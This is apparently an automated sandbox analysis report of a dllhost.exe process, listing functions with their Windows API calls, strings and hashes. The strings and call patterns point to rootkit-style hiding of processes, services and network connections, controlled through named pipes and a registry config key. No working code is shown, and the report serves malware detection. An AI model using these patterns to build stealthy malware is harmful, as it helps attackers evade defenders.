Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

Function 0000000140003204 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236
registrymemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 000000014000327C

Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 000000014000189E
Part of subcall function 0000000140001868: IsWow64Process.KERNEL32 ref: 00000001400018BA
Part of subcall function 0000000140001868: CloseHandle.KERNELBASE ref: 00000001400018DE
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001939
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001958
Part of subcall function 0000000140001868: K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
Part of subcall function 0000000140001868: PathFindFileNameW.SHLWAPI ref: 0000000140001987
Part of subcall function 0000000140001868: lstrlenW.KERNEL32 ref: 0000000140001993
Part of subcall function 0000000140001868: StrCpyW.SHLWAPI ref: 00000001400019AA
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 00000001400019B6
Part of subcall function 0000000140001868: StrCmpIW.SHLWAPI ref: 00000001400019EA

Part of subcall function 0000000140001868: NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
Part of subcall function 0000000140001868: OpenProcessToken.ADVAPI32 ref: 0000000140001A43
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001A6F
Part of subcall function 0000000140001868: GetLastError.KERNEL32 ref: 0000000140001A79
Part of subcall function 0000000140001868: LocalAlloc.KERNEL32 ref: 0000000140001A8C
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001AB8
Part of subcall function 0000000140001868: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
Part of subcall function 0000000140001868: GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
Part of subcall function 0000000140001868: LocalFree.KERNEL32 ref: 0000000140001AEC
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 0000000140001B00
Part of subcall function 0000000140001868: StrStrA.SHLWAPI ref: 0000000140001BAB

RegOpenKeyExW.ADVAPI32 ref: 000000014000330D
RegDeleteValueW.ADVAPI32 ref: 0000000140003325
RegDeleteValueW.ADVAPI32 ref: 0000000140003339
RegDeleteValueW.ADVAPI32 ref: 000000014000334D
ExitProcess.KERNEL32 ref: 0000000140003384
GetProcessHeap.KERNEL32 ref: 000000014000338B
HeapAlloc.KERNEL32 ref: 000000014000339E
K32EnumProcesses.KERNEL32 ref: 00000001400033BB
ExitProcess.KERNEL32 ref: 0000000140003479

Strings

$cnt-dll32, xrefs: 0000000140003332
$cnt-dll64, xrefs: 0000000140003346
$cnt-svc32, xrefs: 0000000140003353
open, xrefs: 000000014000357B
$cnt-stager, xrefs: 000000014000331E
SOFTWARE, xrefs: 00000001400032FF
$cnt-svc64, xrefs: 000000014000335F

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
String ID: $cnt-dll32$$cnt-dll64$$cnt-stager$$cnt-svc32$$cnt-svc64$SOFTWARE$open
API String ID: 4225498131-603854293
Opcode ID: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
Opcode Fuzzy Hash: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

Function 0000000140001CF0 Relevance: 19.6, APIs: 13, Instructions: 131
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001D23
HeapAlloc.KERNEL32 ref: 0000000140001D36
GetProcessHeap.KERNEL32 ref: 0000000140001D44
HeapAlloc.KERNEL32 ref: 0000000140001D55
K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
OpenProcess.KERNEL32 ref: 0000000140001D9D
K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
ReadProcessMemory.KERNEL32 ref: 0000000140001E01
CloseHandle.KERNELBASE ref: 0000000140001E46
GetProcessHeap.KERNEL32 ref: 0000000140001E58
HeapFree.KERNEL32 ref: 0000000140001E66
GetProcessHeap.KERNEL32 ref: 0000000140001E6C
RtlFreeHeap.NTDLL ref: 0000000140001E7A

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

Function 0000000140002300 Relevance: 9.1, APIs: 6, Instructions: 82
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
LocalAlloc.KERNEL32 ref: 00000001400023A7
InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

Function 000000014000151C Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001527
HeapAlloc.KERNEL32 ref: 0000000140001536

Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001226
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001235
Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 000000014000124F
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001260

Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001006
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001015
Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001028
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001037

RegOpenKeyExW.ADVAPI32 ref: 00000001400015A6
RegOpenKeyExW.ADVAPI32 ref: 00000001400015D3
RegCloseKey.ADVAPI32 ref: 00000001400015ED
RegOpenKeyExW.ADVAPI32 ref: 000000014000160D
RegCloseKey.KERNELBASE ref: 0000000140001628
RegOpenKeyExW.ADVAPI32 ref: 0000000140001648
RegCloseKey.ADVAPI32 ref: 0000000140001663
RegOpenKeyExW.ADVAPI32 ref: 0000000140001683
RegCloseKey.ADVAPI32 ref: 000000014000169E
RegOpenKeyExW.ADVAPI32 ref: 00000001400016BE
RegCloseKey.ADVAPI32 ref: 00000001400016D9
RegOpenKeyExW.ADVAPI32 ref: 00000001400016F9
RegCloseKey.ADVAPI32 ref: 0000000140001714
RegOpenKeyExW.ADVAPI32 ref: 0000000140001734
RegCloseKey.ADVAPI32 ref: 000000014000174F
RegOpenKeyExW.ADVAPI32 ref: 000000014000176F
RegCloseKey.ADVAPI32 ref: 000000014000178A
RegCloseKey.ADVAPI32 ref: 0000000140001794

Part of subcall function 0000000140001274: RegQueryInfoKeyW.ADVAPI32 ref: 00000001400012D1
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400012DF
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400012F0
Part of subcall function 0000000140001274: RegEnumValueW.ADVAPI32 ref: 000000014000134F
Part of subcall function 0000000140001274: StrCmpIW.SHLWAPI ref: 0000000140001388
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013C7
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400013D5
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013F2
Part of subcall function 0000000140001274: HeapFree.KERNEL32 ref: 0000000140001400

Strings

udp, xrefs: 0000000140001768
tcp_local, xrefs: 00000001400016F2
tcp_remote, xrefs: 000000014000172D
SOFTWARE\$cnt-config, xrefs: 0000000140001586
startup, xrefs: 00000001400015C9
paths, xrefs: 000000014000167C
pid, xrefs: 0000000140001606
process_names, xrefs: 0000000140001641
service_names, xrefs: 00000001400016B7

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 3993315683-2609720707
Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

Function 0000000140002A0C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 0000000140002A3D
StrCatW.SHLWAPI ref: 0000000140002A4B
GetModuleHandleW.KERNEL32 ref: 0000000140002A54
GetCurrentProcess.KERNEL32 ref: 0000000140002A74
K32GetModuleInformation.KERNEL32 ref: 0000000140002A88
CreateFileW.KERNELBASE ref: 0000000140002AB8
CreateFileMappingW.KERNELBASE ref: 0000000140002AE2
MapViewOfFile.KERNELBASE ref: 0000000140002B05
lstrcmpiA.KERNEL32 ref: 0000000140002B5B
VirtualProtect.KERNEL32 ref: 0000000140002B8E
VirtualProtect.KERNEL32 ref: 0000000140002BBE
CloseHandle.KERNELBASE ref: 0000000140002BC7
CloseHandle.KERNEL32 ref: 0000000140002BD0
FreeLibrary.KERNEL32 ref: 0000000140002BD9

Strings

C:\Windows\System32\, xrefs: 0000000140002A2F
.text, xrefs: 0000000140002B54

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

Function 0000000140003728 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 000000014000374D
ConnectNamedPipe.KERNELBASE ref: 000000014000375A
ReadFile.KERNELBASE ref: 000000014000377D
WriteFile.KERNEL32 ref: 00000001400037AB
Sleep.KERNEL32 ref: 00000001400037B8
DisconnectNamedPipe.KERNELBASE ref: 00000001400037C1

Strings

M, xrefs: 000000014000379E
\\.\pipe\$cnt-childproc, xrefs: 0000000140003735

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\$cnt-childproc
API String ID: 2203880229-3486825944
Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

Function 0000000140002CB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 0000000140002CD5
ConnectNamedPipe.KERNELBASE ref: 0000000140002CE2
ReadFile.KERNELBASE ref: 0000000140002D05
Sleep.KERNEL32 ref: 0000000140002D26
DisconnectNamedPipe.KERNELBASE ref: 0000000140002D2F

Strings

\\.\pipe\$cnt-control, xrefs: 0000000140002CBD

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\$cnt-control
API String ID: 2071455217-1242848813
Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704

Function 0000000140003668 Relevance: 9.1, APIs: 6, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140003683
HeapAlloc.KERNEL32 ref: 0000000140003697
GetProcessHeap.KERNEL32 ref: 00000001400036A0
HeapAlloc.KERNEL32 ref: 00000001400036AE
K32EnumProcesses.KERNEL32 ref: 00000001400036C9
SleepEx.KERNELBASE ref: 000000014000371E

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00

Function 000000014000200C Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002021
HeapAlloc.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002032

Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D23
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D36
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D44
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D55
Part of subcall function 0000000140001CF0: K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
Part of subcall function 0000000140001CF0: OpenProcess.KERNEL32 ref: 0000000140001D9D
Part of subcall function 0000000140001CF0: K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
Part of subcall function 0000000140001CF0: ReadProcessMemory.KERNEL32 ref: 0000000140001E01
Part of subcall function 0000000140001CF0: CloseHandle.KERNELBASE ref: 0000000140001E46
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E58
Part of subcall function 0000000140001CF0: HeapFree.KERNEL32 ref: 0000000140001E66
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E6C
Part of subcall function 0000000140001CF0: RtlFreeHeap.NTDLL ref: 0000000140001E7A

OpenProcess.KERNEL32 ref: 0000000140002079
TerminateProcess.KERNEL32 ref: 000000014000208C
CloseHandle.KERNEL32 ref: 0000000140002095
GetProcessHeap.KERNEL32 ref: 00000001400020A5

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

Function 00000279A927F598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00000279A927F611
GetFileType.KERNELBASE ref: 00000279A927F627

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: ccc3af4c3a5c1227648368b2324eb35d68d95760e921e9e96ecafc937749e508
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 6F31C32261DB6595EB608F2995882A93A50F345BB0F6A0309DF7E273F0CB35D4E1C340

Function 00000279A92AF598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00000279A92AF611
GetFileType.KERNELBASE ref: 00000279A92AF627

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: d32eeef765fc0ecfac449c0f0d38d7619557313e682b12b10438d63190e77709
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: CC319323A1AB6499EB608F1595882A96B50F345FB0F6A0309DF7E477F0CB39D8E1D340

Function 00000279A9242EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00000279A924302E

Memory Dump Source

Source File: 00000025.00000003.1886521218.00000279A9240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000279A9240000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_3_279a9240000_dllhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 6bf068f77e8d8a8896a474b48b598099e98cf1c99c40d151a550765da96543d3
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 9A910672B267508BDB648F25D608B6DB391FB94BB8F568124DE4E4778CDE38D892C700

Function 0000000140002D38 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
